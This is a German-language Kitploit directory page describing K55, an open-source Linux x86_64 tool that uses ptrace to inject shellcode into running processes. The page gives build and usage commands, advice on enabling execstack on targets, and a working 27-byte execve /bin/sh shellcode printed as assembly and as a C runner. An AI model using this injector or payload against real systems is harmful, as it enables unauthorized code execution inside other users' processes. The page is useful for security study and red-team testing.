Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
K55 — Linux x86_64 Prozessinjektions-Dienstprogramm | Kitploit
Tools/GitHubGitHub/josh0xa/k55
ExploitationShellcodeRed Teaming
GitHubjosh0xa/k55

K55

Linux x86_64 Prozessinjektions-Dienstprogramm

Repository anzeigen
5913vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

K55 - Linux x86_64 Prozess-Injektions-Dienstprogramm (C++14)

lisence

Über K55

(ausgesprochen: "kay fifty-five")
Das K55-Payload-Injektionswerkzeug dient dem Injizieren von x86_64-Shellcode-Payloads in laufende Prozesse. Das Dienstprogramm wurde mit modernen C++11-Techniken sowie einigen traditionellen C-Linux-Funktionen wie ptrace() entwickelt. Der im Zielprozess gestartete Shellcode ist 27 Bytes groß und führt /bin/sh (startet eine Bash-Shell) im Adressraum des Ziels aus. In Zukunft werde ich es Benutzern ermöglichen, eigenen Shellcode über Kommandozeilenargumente einzugeben.

Installation

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 Verwendung

Verwendung: ./K55 <prozess-name>

  • prozess-name kann jeder Linux-Prozess mit r-xp- oder execstack-Berechtigungen sein.

Tests

Test 1) In einem Terminal (K55/ Verzeichnis) ausführen: ./k55_example_process/k55_test_process
Test 2) In einem anderen Terminal den Injektor ausführen: sudo ./K55 k55_test_process

K55 in Aktion

  • Eine Shell wird in k55_test_process gestartet, wenn der K55-Shellcode-Injektor (als root) ausgeführt wird.

Injektion in einen gegebenen Prozess

Im Ziel gestartete Shell

Einschränkungen

Offensichtlich sind ptrace(PTRACE_POKETEXT...)-Aufrufe nicht die getarntesten. Daher können einige Anwendungen die Wirkung von K55 einschränken. Für Sicherheitstests sollte jedoch execstack für die Zielanwendungen aktiviert werden. Wenn ich zum Beispiel mit gdb teste, würde ich vor der Injektion Folgendes ausführen: sudo execstack -s /usr/bin/gdb. Installieren Sie execstack über den Paketmanager Ihrer Distribution. Für Arch-Linux-Benutzer ist execstack im AUR verfügbar.

Erstellen des Shell-Payloads

Hinweis: Das Folgende ist eine Demonstration. Der Payload-String ist bereits fest in K55 codiert.

Assembly-Implementierung des Payloads (Zitiert von shell-storm (Weiterleitung))

root@kitploit:~
main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

C-Implementierung des Payloads

root@kitploit:~
#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

Referenzen

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

Lizenz

MIT Lizenz
Copyright (c) Josh Schiavone

Tool herunterladen